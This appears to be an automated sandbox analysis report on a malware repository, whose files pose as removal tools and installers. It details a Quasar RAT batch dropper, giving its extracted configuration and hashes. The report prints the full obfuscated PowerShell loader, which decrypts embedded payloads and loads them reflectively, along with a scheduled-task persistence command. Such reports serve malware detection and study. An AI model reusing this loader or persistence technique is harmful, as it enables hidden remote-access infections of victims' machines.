Overview
overview
10Static
static
10zvgfd-main...iz.bat
windows10-2004-x64
1zvgfd-main...lt.exe
windows10-2004-x64
zvgfd-main/Client.bat
windows10-2004-x64
10zvgfd-main...lt.exe
windows10-2004-x64
zvgfd-main... .exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...ve.bat
windows10-2004-x64
10zvgfd-main...ve.exe
windows10-2004-x64
10zvgfd-main...ke.bat
windows10-2004-x64
10zvgfd-main...V2.exe
windows10-2004-x64
10zvgfd-main...ll.exe
windows10-2004-x64
10zvgfd-main...up.exe
windows10-2004-x64
8zvgfd-main/Output.exe
windows10-2004-x64
10zvgfd-main/Part 1.bat
windows10-2004-x64
10zvgfd-main/Part 2.bat
windows10-2004-x64
1zvgfd-main...om.exe
windows10-2004-x64
1zvgfd-main...er.exe
windows10-2004-x64
10zvgfd-main/Server.exe
windows10-2004-x64
10zvgfd-main/Uni.exe
windows10-2004-x64
10zvgfd-main/Uni.exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...nt.exe
windows10-2004-x64
10zvgfd-main...st.exe
windows10-2004-x64
10zvgfd-main/asjdfg.exe
windows10-2004-x64
10zvgfd-main...-3.dll
windows10-2004-x64
3zvgfd-main...h2.dll
windows10-2004-x64
3zvgfd-main...-3.dll
windows10-2004-x64
1zvgfd-main/main.exe
windows10-2004-x64
7zvgfd-main/ncat.exe
windows10-2004-x64
1zvgfd-main...ad.exe
windows10-2004-x64
10Analysis
-
max time kernel
91s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
15-07-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
zvgfd-main/Are You Skibidy, The Quiz.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
zvgfd-main/Client-built.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
zvgfd-main/Client.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
zvgfd-main/Client_built.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
zvgfd-main/Empyrean Removal Tool .exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral6
Sample
zvgfd-main/Empyrean Removal Tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
zvgfd-main/Empyrean Removal Tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral8
Sample
zvgfd-main/Fanta.Live.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
zvgfd-main/Fanta.Live.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral10
Sample
zvgfd-main/Fanta_Is_Better_Than_Coke.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
zvgfd-main/Frozen Loader V2.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral12
Sample
zvgfd-main/Install.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral13
Sample
zvgfd-main/OperaGXSetup.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral14
Sample
zvgfd-main/Output.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
zvgfd-main/Part 1.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral16
Sample
zvgfd-main/Part 2.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
zvgfd-main/Phantom.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral18
Sample
zvgfd-main/PyMain Installer.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
zvgfd-main/Server.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral20
Sample
zvgfd-main/Uni.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
zvgfd-main/Uni.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral22
Sample
zvgfd-main/VIrus removal tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral23
Sample
zvgfd-main/Virus removal tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral24
Sample
zvgfd-main/XClient.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
zvgfd-main/XClientTest.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral26
Sample
zvgfd-main/asjdfg.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
zvgfd-main/libcrypto-3.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral28
Sample
zvgfd-main/libssh2.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
zvgfd-main/libssl-3.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral30
Sample
zvgfd-main/main.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
zvgfd-main/ncat.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral32
Sample
zvgfd-main/payload.exe
Resource
win10v2004-20240709-en
General
-
Target
zvgfd-main/Client.bat
-
Size
1.6MB
-
MD5
439120f796ed4977f594bea8bd82cf31
-
SHA1
4584ec947309d2c0d3aa0b7af99a74e914649f1f
-
SHA256
a2ef6988f4d2669de231d1857b5fb9b64d0069252db3c017498a065f2d1574cc
-
SHA512
605f0958b42a350f9b4a01cfb47e17d6d095a4a299ad182c537016d5fb1e83c3860d4141cae74242644504aac6b3b5378e6c4551b1bba918bb793fe8e883a49b
-
SSDEEP
24576:JlkfZfen9VM4J5pHntF5rAkcVYymcJQy+DFayCGw/+MjKOqfVZ8gl5fMR/wXR9D5:JwfenPM4jFX16Y0QXS/+MuOECE6dQ
Malware Config
Extracted
quasar
1.4.2
Testing
127.0.0.1:4782
da53512e-6c73-406a-b1ee-fcfefff35b99
-
encryption_key
4B317113B678FE9A27AFEB228E60516202859C8D
-
install_name
$77~HWllo.exe.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
$77~Update
-
subdirectory
$77~TEMP
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral3/memory/4892-15-0x000001927D710000-0x000001927DA34000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4892 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3576 $77~HWllo.exe.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\$77~TEMP powershell.exe File created C:\Windows\System32\$77~TEMP\$77~HWllo.exe.exe powershell.exe File opened for modification C:\Windows\System32\$77~TEMP\$77~HWllo.exe.exe powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3572 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4892 powershell.exe 4892 powershell.exe 3576 $77~HWllo.exe.exe 3576 $77~HWllo.exe.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 3576 $77~HWllo.exe.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3512 wrote to memory of 4892 3512 cmd.exe 87 PID 3512 wrote to memory of 4892 3512 cmd.exe 87 PID 4892 wrote to memory of 3572 4892 powershell.exe 89 PID 4892 wrote to memory of 3572 4892 powershell.exe 89 PID 4892 wrote to memory of 3576 4892 powershell.exe 91 PID 4892 wrote to memory of 3576 4892 powershell.exe 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Client.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xJw0qxbvy2e5E+kymgZPIMGoA6fqk1en/iSXbiH7YCA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('koOlFjUNdaFTz7/D0mS0pg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAeaN=New-Object System.IO.MemoryStream(,$param_var); $exKaE=New-Object System.IO.MemoryStream; $SIYdw=New-Object System.IO.Compression.GZipStream($EAeaN, [IO.Compression.CompressionMode]::Decompress); $SIYdw.CopyTo($exKaE); $SIYdw.Dispose(); $EAeaN.Dispose(); $exKaE.Dispose(); $exKaE.ToArray();}function execute_function($param_var,$param2_var){ $hIoGB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NhWqy=$hIoGB.EntryPoint; $NhWqy.Invoke($null, $param2_var);}$WzOZn = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Client.bat';$host.UI.RawUI.WindowTitle = $WzOZn;$QigrC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($WzOZn).Split([Environment]::NewLine);foreach ($mmglW in $QigrC) { if ($mmglW.StartsWith(':: ')) { $fLOwg=$mmglW.Substring(3); break; }}$payloads_var=[string[]]$fLOwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$77~Update" /sc ONLOGON /tr "C:\Windows\system32\$77~TEMP\$77~HWllo.exe.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3572
-
-
C:\Windows\system32\$77~TEMP\$77~HWllo.exe.exe"C:\Windows\system32\$77~TEMP\$77~HWllo.exe.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b